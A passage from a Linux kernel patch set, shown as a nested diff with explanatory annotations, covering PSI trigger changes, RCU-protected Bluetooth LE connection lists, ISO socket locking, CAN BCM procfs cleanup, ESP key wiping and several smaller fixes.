+ static int psi_io_open(struct inode *inode, struct file *file)
+ {
+-	return psi_open(file, psi_io_show);
++	return single_open(file, psi_io_show, NULL);
+ }
+ 
+ static int psi_memory_open(struct inode *inode, struct file *file)
+ {
+-	return psi_open(file, psi_memory_show);
++	return single_open(file, psi_memory_show, NULL);
+ }
+ 
+ static int psi_cpu_open(struct inode *inode, struct file *file)
+ {
+-	return psi_open(file, psi_cpu_show);
++	return single_open(file, psi_cpu_show, NULL);
+ }
+ 
+ static ssize_t psi_write(struct file *file, const char __user *user_buf,
+@@ -1465,7 +1545,7 @@ static ssize_t psi_write(struct file *file, const char __user *user_buf,
+ 		return -EBUSY;
+ 	}
+ 
+-	new = psi_trigger_create(&psi_system, buf, res);
++	new = psi_trigger_create(&psi_system, buf, res, file, NULL);
+ 	if (IS_ERR(new)) {
+ 		mutex_unlock(&seq->lock);
+ 		return PTR_ERR(new);
+@@ -1545,7 +1625,7 @@ static int psi_irq_show(struct seq_file *m, void *v)
+ 
+ static int psi_irq_open(struct inode *inode, struct file *file)
+ {
+-	return psi_open(file, psi_irq_show);
++	return single_open(file, psi_irq_show, NULL);
+ }
+ 
+ static ssize_t psi_irq_write(struct file *file, const char __user *user_buf,
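[The psi.c hunks above drop the CAP_SYS_RESOURCE gate from the /proc/pressure open paths and split triggers across two aggregators: privileged triggers keep the dedicated RT "psimon" kthread, while unprivileged ones ride the existing averages worker, which is why their window must now be a whole multiple of 2s. A minimal userspace sketch of registering such a trigger, following the documented /proc/pressure interface; the file and thresholds here are illustrative:

/* Register an unprivileged PSI trigger: 150ms of "some" memory stall
 * within a 2s window. With this change the window must be a multiple
 * of 2000000us for callers without CAP_SYS_RESOURCE.
 */
#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
	const char trig[] = "some 150000 2000000";
	struct pollfd pfd;
	int fd;

	fd = open("/proc/pressure/memory", O_RDWR | O_NONBLOCK);
	if (fd < 0)
		return 1;
	if (write(fd, trig, strlen(trig) + 1) < 0)
		return 1;

	pfd.fd = fd;
	pfd.events = POLLPRI;
	while (poll(&pfd, 1, -1) > 0) {
		if (pfd.revents & POLLERR)
			break;		/* e.g. the file went away */
		if (pfd.revents & POLLPRI)
			puts("memory pressure event");
	}
	close(fd);
	return 0;
}
]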
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 105253b9bc31d..0f5d16eabd3b0 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -6560,7 +6560,8 @@ static int event_hist_trigger_parse(struct event_command *cmd_ops,
+ 		goto out_unreg;
+ 
+ 	if (has_hist_vars(hist_data) || hist_data->n_var_refs) {
+-		if (save_hist_vars(hist_data))
++		ret = save_hist_vars(hist_data);
++		if (ret)
+ 			goto out_unreg;
+ 	}
+ 
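[The trace_events_hist.c change is a plain error-propagation fix: the old code tested save_hist_vars() but jumped to out_unreg without assigning ret, so a failure could be masked by whatever ret happened to hold. The shape of the bug and the fix in a compilable sketch with stub helpers (all names hypothetical):

#include <errno.h>

static int save_vars(void) { return -ENOMEM; }	/* assumed failing step */
static void unregister(void) {}

static int register_hist(void)
{
	int ret;

	/* was: if (save_vars()) goto out_unreg;  -- error code lost */
	ret = save_vars();
	if (ret)
		goto out_unreg;
	return 0;

out_unreg:
	unregister();
	return ret;	/* caller now sees -ENOMEM, not a stale 0 */
}
]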
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 2f1f661157c92..47d0c95b9a01e 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -3711,7 +3711,8 @@ static inline int mas_root_expand(struct ma_state *mas, void *entry)
+ 	mas->offset = slot;
+ 	pivots[slot] = mas->last;
+ 	if (mas->last != ULONG_MAX)
+-		slot++;
++		pivots[++slot] = ULONG_MAX;
++
+ 	mas->depth = 1;
+ 	mas_set_height(mas);
+ 	ma_set_meta(node, maple_leaf_64, 0, slot);
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index fef09d2121384..61059571c8779 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -117,7 +117,7 @@ static void hci_connect_le_scan_cleanup(struct hci_conn *conn, u8 status)
+ 	 */
+ 	params->explicit_connect = false;
+ 
+-	list_del_init(&params->action);
++	hci_pend_le_list_del_init(params);
+ 
+ 	switch (params->auto_connect) {
+ 	case HCI_AUTO_CONN_EXPLICIT:
+@@ -126,10 +126,10 @@ static void hci_connect_le_scan_cleanup(struct hci_conn *conn, u8 status)
+ 		return;
+ 	case HCI_AUTO_CONN_DIRECT:
+ 	case HCI_AUTO_CONN_ALWAYS:
+-		list_add(&params->action, &hdev->pend_le_conns);
++		hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 		break;
+ 	case HCI_AUTO_CONN_REPORT:
+-		list_add(&params->action, &hdev->pend_le_reports);
++		hci_pend_le_list_add(params, &hdev->pend_le_reports);
+ 		break;
+ 	default:
+ 		break;
+@@ -1398,8 +1398,8 @@ static int hci_explicit_conn_params_set(struct hci_dev *hdev,
+ 	if (params->auto_connect == HCI_AUTO_CONN_DISABLED ||
+ 	    params->auto_connect == HCI_AUTO_CONN_REPORT ||
+ 	    params->auto_connect == HCI_AUTO_CONN_EXPLICIT) {
+-		list_del_init(&params->action);
+-		list_add(&params->action, &hdev->pend_le_conns);
++		hci_pend_le_list_del_init(params);
++		hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 	}
+ 
+ 	params->explicit_connect = true;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index ca42129f8f91a..d034bf2a999e1 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -1972,6 +1972,7 @@ static int hci_remove_adv_monitor(struct hci_dev *hdev,
+ 				  struct adv_monitor *monitor)
+ {
+ 	int status = 0;
++	int handle;
+ 
+ 	switch (hci_get_adv_monitor_offload_ext(hdev)) {
+ 	case HCI_ADV_MONITOR_EXT_NONE: /* also goes here when powered off */
+@@ -1980,9 +1981,10 @@ static int hci_remove_adv_monitor(struct hci_dev *hdev,
+ 		goto free_monitor;
+ 
+ 	case HCI_ADV_MONITOR_EXT_MSFT:
++		handle = monitor->handle;
+ 		status = msft_remove_monitor(hdev, monitor);
+ 		bt_dev_dbg(hdev, "%s remove monitor %d msft status %d",
+-			   hdev->name, monitor->handle, status);
++			   hdev->name, handle, status);
+ 		break;
+ 	}
+ 
+@@ -2249,21 +2251,45 @@ struct hci_conn_params *hci_conn_params_lookup(struct hci_dev *hdev,
+ 	return NULL;
+ }
+ 
+-/* This function requires the caller holds hdev->lock */
++/* This function requires the caller holds hdev->lock or rcu_read_lock */
+ struct hci_conn_params *hci_pend_le_action_lookup(struct list_head *list,
+ 						  bdaddr_t *addr, u8 addr_type)
+ {
+ 	struct hci_conn_params *param;
+ 
+-	list_for_each_entry(param, list, action) {
++	rcu_read_lock();
++
++	list_for_each_entry_rcu(param, list, action) {
+ 		if (bacmp(&param->addr, addr) == 0 &&
+-		    param->addr_type == addr_type)
++		    param->addr_type == addr_type) {
++			rcu_read_unlock();
+ 			return param;
++		}
+ 	}
+ 
++	rcu_read_unlock();
++
+ 	return NULL;
+ }
+ 
++/* This function requires the caller holds hdev->lock */
++void hci_pend_le_list_del_init(struct hci_conn_params *param)
++{
++	if (list_empty(&param->action))
++		return;
++
++	list_del_rcu(&param->action);
++	synchronize_rcu();
++	INIT_LIST_HEAD(&param->action);
++}
++
++/* This function requires the caller holds hdev->lock */
++void hci_pend_le_list_add(struct hci_conn_params *param,
++			  struct list_head *list)
++{
++	list_add_rcu(&param->action, list);
++}
++
+ /* This function requires the caller holds hdev->lock */
+ struct hci_conn_params *hci_conn_params_add(struct hci_dev *hdev,
+ 					    bdaddr_t *addr, u8 addr_type)
+@@ -2297,14 +2323,15 @@ struct hci_conn_params *hci_conn_params_add(struct hci_dev *hdev,
+ 	return params;
+ }
+ 
+-static void hci_conn_params_free(struct hci_conn_params *params)
++void hci_conn_params_free(struct hci_conn_params *params)
+ {
++	hci_pend_le_list_del_init(params);
++
+ 	if (params->conn) {
+ 		hci_conn_drop(params->conn);
+ 		hci_conn_put(params->conn);
+ 	}
+ 
+-	list_del(&params->action);
+ 	list_del(&params->list);
+ 	kfree(params);
+ }
+@@ -2342,8 +2369,7 @@ void hci_conn_params_clear_disabled(struct hci_dev *hdev)
+ 			continue;
+ 		}
+ 
+-		list_del(&params->list);
+-		kfree(params);
++		hci_conn_params_free(params);
+ 	}
+ 
+ 	BT_DBG("All LE disabled connection parameters were removed");
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index b272cc1f36481..83eaf25ece465 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -1558,7 +1558,7 @@ static u8 hci_cc_le_set_privacy_mode(struct hci_dev *hdev, void *data,
+ 
+ 	params = hci_conn_params_lookup(hdev, &cp->bdaddr, cp->bdaddr_type);
+ 	if (params)
+-		params->privacy_mode = cp->mode;
++		WRITE_ONCE(params->privacy_mode, cp->mode);
+ 
+ 	hci_dev_unlock(hdev);
+ 
+@@ -2789,6 +2789,9 @@ static void hci_cs_disconnect(struct hci_dev *hdev, u8 status)
+ 			hci_enable_advertising(hdev);
+ 		}
+ 
++		/* Inform sockets conn is gone before we delete it */
++		hci_disconn_cfm(conn, HCI_ERROR_UNSPECIFIED);
++
+ 		goto done;
+ 	}
+ 
+@@ -2809,8 +2812,8 @@ static void hci_cs_disconnect(struct hci_dev *hdev, u8 status)
+ 
+ 		case HCI_AUTO_CONN_DIRECT:
+ 		case HCI_AUTO_CONN_ALWAYS:
+-			list_del_init(&params->action);
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_del_init(params);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 			break;
+ 
+ 		default:
+@@ -3428,8 +3431,8 @@ static void hci_disconn_complete_evt(struct hci_dev *hdev, void *data,
+ 
+ 		case HCI_AUTO_CONN_DIRECT:
+ 		case HCI_AUTO_CONN_ALWAYS:
+-			list_del_init(&params->action);
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_del_init(params);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 			hci_update_passive_scan(hdev);
+ 			break;
+ 
+@@ -5952,7 +5955,7 @@ static void le_conn_complete_evt(struct hci_dev *hdev, u8 status,
+ 	params = hci_pend_le_action_lookup(&hdev->pend_le_conns, &conn->dst,
+ 					   conn->dst_type);
+ 	if (params) {
+-		list_del_init(&params->action);
++		hci_pend_le_list_del_init(params);
+ 		if (params->conn) {
+ 			hci_conn_drop(params->conn);
+ 			hci_conn_put(params->conn);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 37131a36700a1..2ae038dfc39f7 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -2139,15 +2139,23 @@ static int hci_le_del_accept_list_sync(struct hci_dev *hdev,
+ 	return 0;
+ }
+ 
++struct conn_params {
++	bdaddr_t addr;
++	u8 addr_type;
++	hci_conn_flags_t flags;
++	u8 privacy_mode;
++};
++
+ /* Adds connection to resolve list if needed.
+  * Setting params to NULL programs local hdev->irk
+  */
+ static int hci_le_add_resolve_list_sync(struct hci_dev *hdev,
+-					struct hci_conn_params *params)
++					struct conn_params *params)
+ {
+ 	struct hci_cp_le_add_to_resolv_list cp;
+ 	struct smp_irk *irk;
+ 	struct bdaddr_list_with_irk *entry;
++	struct hci_conn_params *p;
+ 
+ 	if (!use_ll_privacy(hdev))
+ 		return 0;
+@@ -2182,6 +2190,16 @@ static int hci_le_add_resolve_list_sync(struct hci_dev *hdev,
+ 	/* Default privacy mode is always Network */
+ 	params->privacy_mode = HCI_NETWORK_PRIVACY;
+ 
++	rcu_read_lock();
++	p = hci_pend_le_action_lookup(&hdev->pend_le_conns,
++				      &params->addr, params->addr_type);
++	if (!p)
++		p = hci_pend_le_action_lookup(&hdev->pend_le_reports,
++					      &params->addr, params->addr_type);
++	if (p)
++		WRITE_ONCE(p->privacy_mode, HCI_NETWORK_PRIVACY);
++	rcu_read_unlock();
++
+ done:
+ 	if (hci_dev_test_flag(hdev, HCI_PRIVACY))
+ 		memcpy(cp.local_irk, hdev->irk, 16);
+@@ -2194,7 +2212,7 @@ done:
+ 
+ /* Set Device Privacy Mode. */
+ static int hci_le_set_privacy_mode_sync(struct hci_dev *hdev,
+-					struct hci_conn_params *params)
++					struct conn_params *params)
+ {
+ 	struct hci_cp_le_set_privacy_mode cp;
+ 	struct smp_irk *irk;
+@@ -2219,6 +2237,8 @@ static int hci_le_set_privacy_mode_sync(struct hci_dev *hdev,
+ 	bacpy(&cp.bdaddr, &irk->bdaddr);
+ 	cp.mode = HCI_DEVICE_PRIVACY;
+ 
++	/* Note: params->privacy_mode is not updated since it is a copy */
++
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_SET_PRIVACY_MODE,
+ 				     sizeof(cp), &cp, HCI_CMD_TIMEOUT);
+ }
+@@ -2228,7 +2248,7 @@ static int hci_le_set_privacy_mode_sync(struct hci_dev *hdev,
+  * properly set the privacy mode.
+  */
+ static int hci_le_add_accept_list_sync(struct hci_dev *hdev,
+-				       struct hci_conn_params *params,
++				       struct conn_params *params,
+ 				       u8 *num_entries)
+ {
+ 	struct hci_cp_le_add_to_accept_list cp;
+@@ -2426,6 +2446,52 @@ struct sk_buff *hci_read_local_oob_data_sync(struct hci_dev *hdev,
+ 	return __hci_cmd_sync_sk(hdev, opcode, 0, NULL, 0, HCI_CMD_TIMEOUT, sk);
+ }
+ 
++static struct conn_params *conn_params_copy(struct list_head *list, size_t *n)
++{
++	struct hci_conn_params *params;
++	struct conn_params *p;
++	size_t i;
++
++	rcu_read_lock();
++
++	i = 0;
++	list_for_each_entry_rcu(params, list, action)
++		++i;
++	*n = i;
++
++	rcu_read_unlock();
++
++	p = kvcalloc(*n, sizeof(struct conn_params), GFP_KERNEL);
++	if (!p)
++		return NULL;
++
++	rcu_read_lock();
++
++	i = 0;
++	list_for_each_entry_rcu(params, list, action) {
++		/* Racing adds are handled in next scan update */
++		if (i >= *n)
++			break;
++
++		/* No hdev->lock, but: addr, addr_type are immutable.
++		 * privacy_mode is only written by us or in
++		 * hci_cc_le_set_privacy_mode that we wait for.
++		 * We should be idempotent so MGMT updating flags
++		 * while we are processing is OK.
++		 */
++		bacpy(&p[i].addr, &params->addr);
++		p[i].addr_type = params->addr_type;
++		p[i].flags = READ_ONCE(params->flags);
++		p[i].privacy_mode = READ_ONCE(params->privacy_mode);
++		++i;
++	}
++
++	rcu_read_unlock();
++
++	*n = i;
++	return p;
++}
++
+ /* Device must not be scanning when updating the accept list.
+  *
+  * Update is done using the following sequence:
+@@ -2445,11 +2511,12 @@ struct sk_buff *hci_read_local_oob_data_sync(struct hci_dev *hdev,
+  */
+ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ {
+-	struct hci_conn_params *params;
++	struct conn_params *params;
+ 	struct bdaddr_list *b, *t;
+ 	u8 num_entries = 0;
+ 	bool pend_conn, pend_report;
+ 	u8 filter_policy;
++	size_t i, n;
+ 	int err;
+ 
+ 	/* Pause advertising if resolving list can be used as controllers
+@@ -2483,6 +2550,7 @@ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ 		if (hci_conn_hash_lookup_le(hdev, &b->bdaddr, b->bdaddr_type))
+ 			continue;
+ 
++		/* Pointers not dereferenced, no locks needed */
+ 		pend_conn = hci_pend_le_action_lookup(&hdev->pend_le_conns,
+ 						      &b->bdaddr,
+ 						      b->bdaddr_type);
+@@ -2511,23 +2579,50 @@ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ 	 * available accept list entries in the controller, then
+ 	 * just abort and return filter policy value to not use the
+ 	 * accept list.
++	 *
++	 * The list and params may be mutated while we wait for events,
++	 * so make a copy and iterate it.
+ 	 */
+-	list_for_each_entry(params, &hdev->pend_le_conns, action) {
+-		err = hci_le_add_accept_list_sync(hdev, params, &num_entries);
+-		if (err)
++
++	params = conn_params_copy(&hdev->pend_le_conns, &n);
++	if (!params) {
++		err = -ENOMEM;
++		goto done;
++	}
++
++	for (i = 0; i < n; ++i) {
++		err = hci_le_add_accept_list_sync(hdev, &params[i],
++						  &num_entries);
++		if (err) {
++			kvfree(params);
+ 			goto done;
++		}
+ 	}
+ 
++	kvfree(params);
++
+ 	/* After adding all new pending connections, walk through
+ 	 * the list of pending reports and also add these to the
+ 	 * accept list if there is still space. Abort if space runs out.
+ 	 */
+-	list_for_each_entry(params, &hdev->pend_le_reports, action) {
+-		err = hci_le_add_accept_list_sync(hdev, params, &num_entries);
+-		if (err)
++
++	params = conn_params_copy(&hdev->pend_le_reports, &n);
++	if (!params) {
++		err = -ENOMEM;
++		goto done;
++	}
++
++	for (i = 0; i < n; ++i) {
++		err = hci_le_add_accept_list_sync(hdev, &params[i],
++						  &num_entries);
++		if (err) {
++			kvfree(params);
+ 			goto done;
++		}
+ 	}
+ 
++	kvfree(params);
++
+ 	/* Use the allowlist unless the following conditions are all true:
+ 	 * - We are not currently suspending
+ 	 * - There are 1 or more ADV monitors registered and it's not offloaded
+@@ -4778,12 +4873,12 @@ static void hci_pend_le_actions_clear(struct hci_dev *hdev)
+ 	struct hci_conn_params *p;
+ 
+ 	list_for_each_entry(p, &hdev->le_conn_params, list) {
++		hci_pend_le_list_del_init(p);
+ 		if (p->conn) {
+ 			hci_conn_drop(p->conn);
+ 			hci_conn_put(p->conn);
+ 			p->conn = NULL;
+ 		}
+-		list_del_init(&p->action);
+ 	}
+ 
+ 	BT_DBG("All LE pending actions cleared");
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index cb959e8eac185..699e4f400df29 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -116,8 +116,11 @@ static struct iso_conn *iso_conn_add(struct hci_conn *hcon)
+ {
+ 	struct iso_conn *conn = hcon->iso_data;
+ 
+-	if (conn)
++	if (conn) {
++		if (!conn->hcon)
++			conn->hcon = hcon;
+ 		return conn;
++	}
+ 
+ 	conn = kzalloc(sizeof(*conn), GFP_KERNEL);
+ 	if (!conn)
+@@ -285,14 +288,13 @@ static int iso_connect_bis(struct sock *sk)
+ 		goto unlock;
+ 	}
+ 
+-	hci_dev_unlock(hdev);
+-	hci_dev_put(hdev);
++	lock_sock(sk);
+ 
+ 	err = iso_chan_add(conn, sk, NULL);
+-	if (err)
+-		return err;
+-
+-	lock_sock(sk);
++	if (err) {
++		release_sock(sk);
++		goto unlock;
++	}
+ 
+ 	/* Update source addr of the socket */
+ 	bacpy(&iso_pi(sk)->src, &hcon->src);
+@@ -306,7 +308,6 @@ static int iso_connect_bis(struct sock *sk)
+ 	}
+ 
+ 	release_sock(sk);
+-	return err;
+ 
+ unlock:
+ 	hci_dev_unlock(hdev);
+@@ -367,14 +368,13 @@ static int iso_connect_cis(struct sock *sk)
+ 		goto unlock;
+ 	}
+ 
+-	hci_dev_unlock(hdev);
+-	hci_dev_put(hdev);
++	lock_sock(sk);
+ 
+ 	err = iso_chan_add(conn, sk, NULL);
+-	if (err)
+-		return err;
+-
+-	lock_sock(sk);
++	if (err) {
++		release_sock(sk);
++		goto unlock;
++	}
+ 
+ 	/* Update source addr of the socket */
+ 	bacpy(&iso_pi(sk)->src, &hcon->src);
+@@ -391,7 +391,6 @@ static int iso_connect_cis(struct sock *sk)
+ 	}
+ 
+ 	release_sock(sk);
+-	return err;
+ 
+ unlock:
+ 	hci_dev_unlock(hdev);
+@@ -1036,8 +1035,8 @@ static int iso_sock_sendmsg(struct socket *sock, struct msghdr *msg,
+ 			    size_t len)
+ {
+ 	struct sock *sk = sock->sk;
+-	struct iso_conn *conn = iso_pi(sk)->conn;
+ 	struct sk_buff *skb, **frag;
++	size_t mtu;
+ 	int err;
+ 
+ 	BT_DBG("sock %p, sk %p", sock, sk);
+@@ -1049,11 +1048,18 @@ static int iso_sock_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	if (msg->msg_flags & MSG_OOB)
+ 		return -EOPNOTSUPP;
+ 
+-	if (sk->sk_state != BT_CONNECTED)
++	lock_sock(sk);
++
++	if (sk->sk_state != BT_CONNECTED) {
++		release_sock(sk);
+ 		return -ENOTCONN;
++	}
++
++	mtu = iso_pi(sk)->conn->hcon->hdev->iso_mtu;
++
++	release_sock(sk);
+ 
+-	skb = bt_skb_sendmsg(sk, msg, len, conn->hcon->hdev->iso_mtu,
+-			     HCI_ISO_DATA_HDR_SIZE, 0);
++	skb = bt_skb_sendmsg(sk, msg, len, mtu, HCI_ISO_DATA_HDR_SIZE, 0);
+ 	if (IS_ERR(skb))
+ 		return PTR_ERR(skb);
+ 
+@@ -1066,8 +1072,7 @@ static int iso_sock_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	while (len) {
+ 		struct sk_buff *tmp;
+ 
+-		tmp = bt_skb_sendmsg(sk, msg, len, conn->hcon->hdev->iso_mtu,
+-				     0, 0);
++		tmp = bt_skb_sendmsg(sk, msg, len, mtu, 0, 0);
+ 		if (IS_ERR(tmp)) {
+ 			kfree_skb(skb);
+ 			return PTR_ERR(tmp);
+@@ -1122,15 +1127,19 @@ static int iso_sock_recvmsg(struct socket *sock, struct msghdr *msg,
+ 	BT_DBG("sk %p", sk);
+ 
+ 	if (test_and_clear_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags)) {
++		lock_sock(sk);
+ 		switch (sk->sk_state) {
+ 		case BT_CONNECT2:
+-			lock_sock(sk);
+ 			iso_conn_defer_accept(pi->conn->hcon);
+ 			sk->sk_state = BT_CONFIG;
+ 			release_sock(sk);
+ 			return 0;
+ 		case BT_CONNECT:
++			release_sock(sk);
+ 			return iso_connect_cis(sk);
++		default:
++			release_sock(sk);
++			break;
+ 		}
+ 	}
+ 
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 815f2abe918ef..89c94f3e96bc3 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -1297,15 +1297,15 @@ static void restart_le_actions(struct hci_dev *hdev)
+ 		/* Needed for AUTO_OFF case where might not "really"
+ 		 * have been powered off.
+ 		 */
+-		list_del_init(&p->action);
++		hci_pend_le_list_del_init(p);
+ 
+ 		switch (p->auto_connect) {
+ 		case HCI_AUTO_CONN_DIRECT:
+ 		case HCI_AUTO_CONN_ALWAYS:
+-			list_add(&p->action, &hdev->pend_le_conns);
++			hci_pend_le_list_add(p, &hdev->pend_le_conns);
+ 			break;
+ 		case HCI_AUTO_CONN_REPORT:
+-			list_add(&p->action, &hdev->pend_le_reports);
++			hci_pend_le_list_add(p, &hdev->pend_le_reports);
+ 			break;
+ 		default:
+ 			break;
+@@ -5161,7 +5161,7 @@ static int set_device_flags(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		goto unlock;
+ 	}
+ 
+-	params->flags = current_flags;
++	WRITE_ONCE(params->flags, current_flags);
+ 	status = MGMT_STATUS_SUCCESS;
+ 
+ 	/* Update passive scan if HCI_CONN_FLAG_DEVICE_PRIVACY
+@@ -7573,7 +7573,7 @@ static int hci_conn_params_set(struct hci_dev *hdev, bdaddr_t *addr,
+ 	if (params->auto_connect == auto_connect)
+ 		return 0;
+ 
+-	list_del_init(&params->action);
++	hci_pend_le_list_del_init(params);
+ 
+ 	switch (auto_connect) {
+ 	case HCI_AUTO_CONN_DISABLED:
+@@ -7582,18 +7582,18 @@ static int hci_conn_params_set(struct hci_dev *hdev, bdaddr_t *addr,
+ 		 * connect to device, keep connecting.
+ 		 */
+ 		if (params->explicit_connect)
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 		break;
+ 	case HCI_AUTO_CONN_REPORT:
+ 		if (params->explicit_connect)
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 		else
+-			list_add(&params->action, &hdev->pend_le_reports);
++			hci_pend_le_list_add(params, &hdev->pend_le_reports);
+ 		break;
+ 	case HCI_AUTO_CONN_DIRECT:
+ 	case HCI_AUTO_CONN_ALWAYS:
+ 		if (!is_connected(hdev, addr, addr_type))
+-			list_add(&params->action, &hdev->pend_le_conns);
++			hci_pend_le_list_add(params, &hdev->pend_le_conns);
+ 		break;
+ 	}
+ 
+@@ -7816,9 +7816,7 @@ static int remove_device(struct sock *sk, struct hci_dev *hdev,
+ 			goto unlock;
+ 		}
+ 
+-		list_del(&params->action);
+-		list_del(&params->list);
+-		kfree(params);
++		hci_conn_params_free(params);
+ 
+ 		device_removed(sk, hdev, &cp->addr.bdaddr, cp->addr.type);
+ 	} else {
+@@ -7849,9 +7847,7 @@ static int remove_device(struct sock *sk, struct hci_dev *hdev,
+ 				p->auto_connect = HCI_AUTO_CONN_EXPLICIT;
+ 				continue;
+ 			}
+-			list_del(&p->action);
+-			list_del(&p->list);
+-			kfree(p);
++			hci_conn_params_free(p);
+ 		}
+ 
+ 		bt_dev_dbg(hdev, "All LE connection parameters were removed");
+diff --git a/net/bridge/br_stp_if.c b/net/bridge/br_stp_if.c
+index 75204d36d7f90..b65962682771f 100644
+--- a/net/bridge/br_stp_if.c
++++ b/net/bridge/br_stp_if.c
+@@ -201,6 +201,9 @@ int br_stp_set_enabled(struct net_bridge *br, unsigned long val,
+ {
+ 	ASSERT_RTNL();
+ 
++	if (!net_eq(dev_net(br->dev), &init_net))
++		NL_SET_ERR_MSG_MOD(extack, "STP does not work in non-root netns");
++
+ 	if (br_mrp_enabled(br)) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "STP can't be enabled if MRP is already enabled");
+diff --git a/net/can/bcm.c b/net/can/bcm.c
+index a962ec2b8ba5b..925d48cc50f81 100644
+--- a/net/can/bcm.c
++++ b/net/can/bcm.c
+@@ -1526,6 +1526,12 @@ static int bcm_release(struct socket *sock)
+ 
+ 	lock_sock(sk);
+ 
++#if IS_ENABLED(CONFIG_PROC_FS)
++	/* remove procfs entry */
++	if (net->can.bcmproc_dir && bo->bcm_proc_read)
++		remove_proc_entry(bo->procname, net->can.bcmproc_dir);
++#endif /* CONFIG_PROC_FS */
++
+ 	list_for_each_entry_safe(op, next, &bo->tx_ops, list)
+ 		bcm_remove_op(op);
+ 
+@@ -1561,12 +1567,6 @@ static int bcm_release(struct socket *sock)
+ 	list_for_each_entry_safe(op, next, &bo->rx_ops, list)
+ 		bcm_remove_op(op);
+ 
+-#if IS_ENABLED(CONFIG_PROC_FS)
+-	/* remove procfs entry */
+-	if (net->can.bcmproc_dir && bo->bcm_proc_read)
+-		remove_proc_entry(bo->procname, net->can.bcmproc_dir);
+-#endif /* CONFIG_PROC_FS */
+-
+ 	/* remove device reference */
+ 	if (bo->bound) {
+ 		bo->bound   = 0;
+diff --git a/net/core/devlink.c b/net/core/devlink.c
+index 2aa77d4b80d0a..5a4a4b34ac15c 100644
+--- a/net/core/devlink.c
++++ b/net/core/devlink.c
+@@ -9826,7 +9826,10 @@ EXPORT_SYMBOL_GPL(devlink_free);
+ 
+ static void devlink_port_type_warn(struct work_struct *work)
+ {
+-	WARN(true, "Type was not set for devlink port.");
++	struct devlink_port *port = container_of(to_delayed_work(work),
++						 struct devlink_port,
++						 type_warn_dw);
++	dev_warn(port->devlink->dev, "Type was not set for devlink port.");
+ }
+ 
+ static bool devlink_port_type_should_warn(struct devlink_port *devlink_port)
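[The devlink change replaces a bare WARN(true, ...) -- whose backtrace only points at the workqueue -- with a dev_warn() naming the offending device, recovered from the work item via the usual container_of() idiom. A minimal sketch of that idiom with a hypothetical structure:

#include <linux/device.h>
#include <linux/workqueue.h>

struct my_port {
	struct device *dev;
	struct delayed_work type_warn_dw;
};

static void my_type_warn(struct work_struct *work)
{
	/* to_delayed_work() + container_of() recover the owning object */
	struct my_port *port = container_of(to_delayed_work(work),
					    struct my_port, type_warn_dw);

	dev_warn(port->dev, "Type was not set for port.\n");
}
]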
+diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
+index 52c8047efedbb..2d094d417ecae 100644
+--- a/net/ipv4/esp4.c
++++ b/net/ipv4/esp4.c
+@@ -1132,7 +1132,7 @@ static int esp_init_authenc(struct xfrm_state *x,
+ 	err = crypto_aead_setkey(aead, key, keylen);
+ 
+ free_key:
+-	kfree(key);
++	kfree_sensitive(key);
+ 
+ error:
+ 	return err;
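[The esp4 fix swaps kfree() for kfree_sensitive() on the authenc key buffer so the concatenated key material is wiped before the memory returns to the allocator. Equivalent intent, sketched as a hypothetical helper:

#include <linux/slab.h>
#include <linux/string.h>

static void free_key(u8 *key, size_t keylen)
{
	memzero_explicit(key, keylen);	/* wipe survives dead-store elimination */
	kfree(key);
}
]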
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 8e35ea66d930a..62a3b103f258a 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1016,7 +1016,7 @@ static void reqsk_timer_handler(struct timer_list *t)
+ 
+ 	icsk = inet_csk(sk_listener);
+ 	net = sock_net(sk_listener);
+-	max_syn_ack_retries = icsk->icsk_syn_retries ? :
++	max_syn_ack_retries = READ_ONCE(icsk->icsk_syn_retries) ? :
+ 		READ_ONCE(net->ipv4.sysctl_tcp_synack_retries);
+ 	/* Normally all the openreqs are young and become mature
+ 	 * (i.e. converted to established socket) for first timeout.
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
